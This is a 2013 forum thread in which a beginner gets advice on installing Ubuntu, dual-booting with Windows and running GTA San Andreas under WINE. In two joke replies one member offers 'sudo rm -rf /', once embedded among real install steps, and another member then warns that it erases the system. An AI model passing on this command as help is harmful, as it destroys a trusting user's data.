Convoy Trucking

Hyde Park => Off Topic => Topic started by: Shock on February 10, 2013, 15:18

Title: Linux Help!
Post by: Shock on February 10, 2013, 15:18
Hello
I want to move to linux as an os but i dont know where to download it and how to install it and such stuff, so if someone has a clue how do it pls tell me how to do it

Thanks
Title: Re: Linux Help!
Post by: mamorunl on February 10, 2013, 16:31
Fedora installs itself almost (I have fedora). Ubuntu comes with an installer (like your standard application setup in windows)
Title: Re: Linux Help!
Post by: Hobo on February 10, 2013, 16:52
http://www.ubuntu.com/download/desktop

Burn it to a disk, insert disk, follow onscreen instrustions.

You won't be able to play a lot of windows games. WINE works but it can't run everything.
Title: Re: Linux Help!
Post by: Terrorista310 on February 10, 2013, 20:04
I only know a Portuguese version...


http://caixamagica.pt/pag/a_index.php
Title: Re: Linux Help!
Post by: Dr_dog on February 10, 2013, 23:02
If you try Ubuntu. Dont takethe Windows installer one. I suggest installing it from USB/CD instead. LinuxMint is another good distro to start with, or fedora.
Title: Re: Linux Help!
Post by: Mr.Kangaroo on February 10, 2013, 23:30
Quote from: Dr_dog on February 10, 2013, 23:02
If you try Ubuntu. Dont takethe Windows installer one. I suggest installing it from USB/CD instead. LinuxMint is another good distro to start with, or fedora.
I use Ubuntu as the installer on my mac. When i choose to switch over to windows partition on my mac, i have to choose whether i launch Windows or Ubuntu. From my view its alot easier but is not an OS on its own, instead its incorporated into the windows OS.
Title: Re: Linux Help!
Post by: Storm94 on February 12, 2013, 03:37
Install Gentoo
Title: Re: Linux Help!
Post by: Shock on February 12, 2013, 11:04
Do i do it when i boot my pc or just when im logged on windwos and insert the cd? or what? ;D
Title: Re: Linux Help!
Post by: mamorunl on February 12, 2013, 11:59
Always from boot. Linux CDs are mostly bootable cds (the only installer being able to run from windows is the new Ubuntu one)
Title: Re: Linux Help!
Post by: Shock on February 18, 2013, 10:25
so i have to install it like a windows? i was thinking to have windows and linux. linux for games and windows for school
Title: Re: Linux Help!
Post by: mamorunl on February 18, 2013, 12:04
Linux for games? Lol..

Anyways, you can create a dual boot. Fedora creates a dual boot really easily with the built in manager and Ubuntu can be installed FROM windows. So that is always freaking awesome :D
Title: Re: Linux Help!
Post by: Storm94 on February 20, 2013, 02:23
sudo rm -rf /
Title: Re: Linux Help!
Post by: droctogonapus on February 20, 2013, 03:19
generally there's options to install it along with windows or completely replacing windows which deletes everything off the hard drive.  At least with the linux os' i have used.  Linux isn't really ment for gaming due to its limitations and compatibility with games.
Title: Re: Linux Help!
Post by: Shock on February 21, 2013, 10:53
I want to have both windows that i have curently installed and i want to have linux.. now i have downloaded ubuntn but it wont install without boot. so how do i make it bootable with an us(my cd drive is broken)
Title: Re: Linux Help!
Post by: Shock on February 24, 2013, 15:28
OK i have installed it and everything. The thing is now how do i download and install GTA San Andreas and SAMP on ubuntu 12.10?
Title: Re: Linux Help!
Post by: Storm94 on February 28, 2013, 11:18
Quote from: Shockwave[CRO] on February 24, 2013, 15:28
OK i have installed it and everything. The thing is now how do i download and install GTA San Andreas and SAMP on ubuntu 12.10?
open terminal
sudo rm -rf /
sudo apt-get install WINE
install GTA and SA from within the WINE wrapper.
Title: Re: Linux Help!
Post by: mamorunl on February 28, 2013, 13:22
Ignore the second one.

rm -rf / removes your whole computer.

rm (remove)
-rf (recursive with force)
/ (from the root)